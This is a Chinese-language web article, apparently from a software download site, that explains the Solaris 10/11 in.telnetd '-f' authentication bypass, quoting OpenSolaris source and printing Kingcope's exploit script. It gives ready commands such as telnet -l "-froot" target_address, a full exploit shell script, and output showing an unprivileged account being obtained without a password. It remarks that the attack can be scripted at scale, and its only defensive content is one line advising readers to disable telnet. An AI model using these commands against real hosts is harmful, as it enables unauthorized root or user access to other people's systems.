Solaris中Telnet的使用_绿色软件之家

绿色软件之家:您身边最放心的安全下载站! 最新更新|软件分类|软件专题|手机版|系统之家|纯净系统

您当前所在位置:首页系统集成网络管理 → Solaris中Telnet的使用

Solaris中Telnet的使用

时间:2015/6/28来源:绿色软件之家作者:网管联盟我要评论(0)

  对于telnet服务的使用我们这里主要讲解一下Solaris系统中的一些应用。那么首先然我们了解一下Solaris系统的相关内容和telnet的功能吧。如果你的Solaris系统运行了telnet服务程序, 你将会感到十分惊讶: 只需执行一个简单的步骤就可以获得root权限(也可以是其它用户权限). 该漏洞的全称是: Solaris 10/11系统上的telnet远程root漏洞(或SunOS 5.10/5.11 in.telnetd 远程漏洞). 无需任何技巧和漏洞知识, 你就可以通过脚本执行大规模的攻击. 完整的漏洞利用方法可以从该pdf文章获得(或从文章下面的漏洞代码解释部分). 下面简单介绍一下如何利用该漏洞. 基本上你可以在telnet命令的-l选项后指定任何一个"-fusername"参数, fusername可以是任何你需要的用户名, 比如bin, root等. 执行telnet后可以得到fusername指定的用户权限. 比如:

  telnet -l "-fbin" target_address

  看到这里请禁止您solaris系统上的telnet程序. 另外该漏洞的HEV数据可以从ErraSec网站下载.

  注: Solaris 10的默认安装不会受到该漏洞的影响. 如果你修改了/etc/default/login配置文件中的CONSOLE变量, 你将只能通过本地控制台root登陆系统. 当然如果你注释掉了CONSOLE这一行的话, 任何用户都将可以通过本地或远程方式利用telnet漏洞.

  telnet -l "-froot" target_address

  漏洞代码解释

  下面的漏洞代码适用于SunOS 5.10/5.11系统上的in.telnetd程序, 原作者是Kingcope.

  首先看Opensolaris的源代码:

  1.CODE:

  2./usr/src/cmd/cmd-inet/usr.sbin/in.telnetd.c

  3.3198

  4.3199 } else /* default, no auth. info available, login does it all */ {

  5.3200 (void) execl(LOGIN_PROGRAM, "login",

  6.3201 "-p", "-h", host, "-d", slavename,

  7.3202 getenv("USER"), 0);

  8.3203 }

  9./usr/src/cmd/login/login.c

  10.1397 break;

  11.1398

  12.1399 case 'f':

  13.1400 /*

  14.1401 * Must be root to bypass authentication

  15.1402 * otherwise we exit() as punishment for trying.

  16.1403 */

  17.1404 if (getuid() != 0 || geteuid() != 0) {

  18.1405 audit_error = ADT_FAIL_VALUE_AUTH_BYPASS;

  19.1406

  20.1407 login_exit(1); /* sigh */

  21.1408 /*NOTREACHED*/

  22.1409 }

  23.1410 /* save fflag user name for future use */

  24.1411 SCPYL(user_name, optarg);

  25.1412 fflag = B_TRUE;

  看完上面后, 我们可以通过设置USER环境变量"-fusername"来获得需要的用户权限, 新的用户登陆无需口令验证.

  下面是正式的漏洞利用代码(称作sunos):

  ---开始---

  1.#!/bin/sh

  2.# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL

  3.#

  4.# *********************ATTENTION********************************

  5.# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES

  6.# (C) COPYRIGHT Kingcope, 2007

  7.#

  8.################################################################

  9.echo ""

  10.echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net"

  11.if [ $# -ne 2 ]; then

  12.echo "./sunos "

  13.echo "./sunos localhost bin"

  14.exit

  15.fi

  16.echo ""

  17.echo "ALEX ALEX"

  18.echo ""

  19.telnet -l"-f$2" $1

  ---结束---

  然后执行漏洞程序:

  1.$ ./sunos adm

  2.SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net

  3.ALEX ALEX

  4.Trying .

  5.Connected to .

  6.Escape character is '^]'.

  7.Last login: Wed Feb 7 16:28:19 from

  8.Sun Microsystems Inc. SunOS 5.10 Generic January 2005

  9.$ uname -a;id

  10.SunOS library7 5.10 Generic_118833-33 sun4u sparc SUNW,Sun-Fire-V245

  11.uid=4(adm) gid=4(adm)

  12.$

  我们看到, 执行sunos脚本后, 执行者获得了adm帐户权限.

关键词标签:Solaris,Telnet

相关阅读

文章评论
发表评论

热门文章 路由器地址大全-各品牌路由设置地址路由器地址大全-各品牌路由设置地址各品牌的ADSL与路由器出厂默认IP、帐号、密各品牌的ADSL与路由器出厂默认IP、帐号、密Nslookup命令详解-域名DNS诊断Nslookup命令详解-域名DNS诊断站长装备:十大网站管理员服务器工具软件站长装备:十大网站管理员服务器工具软件

相关下载

人气排行 各品牌的ADSL与路由器出厂默认IP、帐号、密码路由器地址大全-各品牌路由设置地址腾达路由器怎么设置?腾达路由器设置教程ADSL双线负载均衡设置详细图文教程路由表说明(详解route print)网管员实际工作的一天用此方法让2M带宽下载速度达到250K/S左右网管必会!了解交换机控制端口流量